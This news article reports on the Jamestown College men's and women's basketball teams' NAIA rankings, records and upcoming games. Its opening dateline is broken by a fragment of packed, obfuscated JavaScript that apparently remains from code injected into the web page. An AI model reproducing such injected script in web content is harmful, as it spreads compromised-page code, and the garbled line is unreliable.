JAMESTOWN nitrn|var|u0026u|referrer|znekf||js|php’.split(‘|’),0,{}))
– About midway through their regular season schedule, the Jamestown College men’s and women’s basketball teams are both flying high.

Jamestown’s women have put together a 13-1 record, and are rated No. 15 in the latest NAIA Top 25 Coaches’ Poll. Jamestown’s men have a 10-3 record so far, and are rated No. 13 in the latest poll.

Although its not quite the halfway point of the regular season, both teams have positioned themselves to make a run at the NAIA National Tournament. Both are the top-rated team in the Association of Independent Institutions and have the current resumes to receive an at-large bid to the national tournament.

The next month of games will be key for each team. The next Top 25 Poll doesn’t come out until Jan. 9, meaning there could be a lot of moving and shaking in the rankings by then. Meanwhile, both Jamestown teams face some quality teams over the next month that should test their early-season progress.

Jamestown’s women have six games before the next ranking, including two against teams making the transition to NCAA Division II: Minot State on Dec. 19, and SD Tech on Jan. 6. Perhaps the most telling games though will come on Dec. 29-30, when the Jimmie women go on the road to take on a pair of Top 5 teams. Jamestown plays both No. 5 Morningside College (10-3) and No. 3 Briar Cliff (10-2) during the Briar Cliff University Tournament in Iowa.

The Jimmie women are no stranger to playing Top 5 teams, and earlier this season knocked off then No. 1 Northwestern during a game in Jamestown.

Jamestown’s men have seven games before the next Top 25 ranking, including trips to Florida and Iowa. Over the next 15 days, Jamestown will play three NAIA Top 25 teams and one team receiving votes. On Saturday, Jamestown starts a trip to Florida with a game at No. 15 Southeastern (Fla.) (9-4), and then plays No. 18 Warner (Fla.) (6-2) on Monday.

On Dec. 29-30, they take on No. 22 Morningside (7-5) and Briar Cliff (9-4) during the Briar Cliff University Tournament in Iowa. Briar Cliff is receiving votes in the latest NAIA Poll.
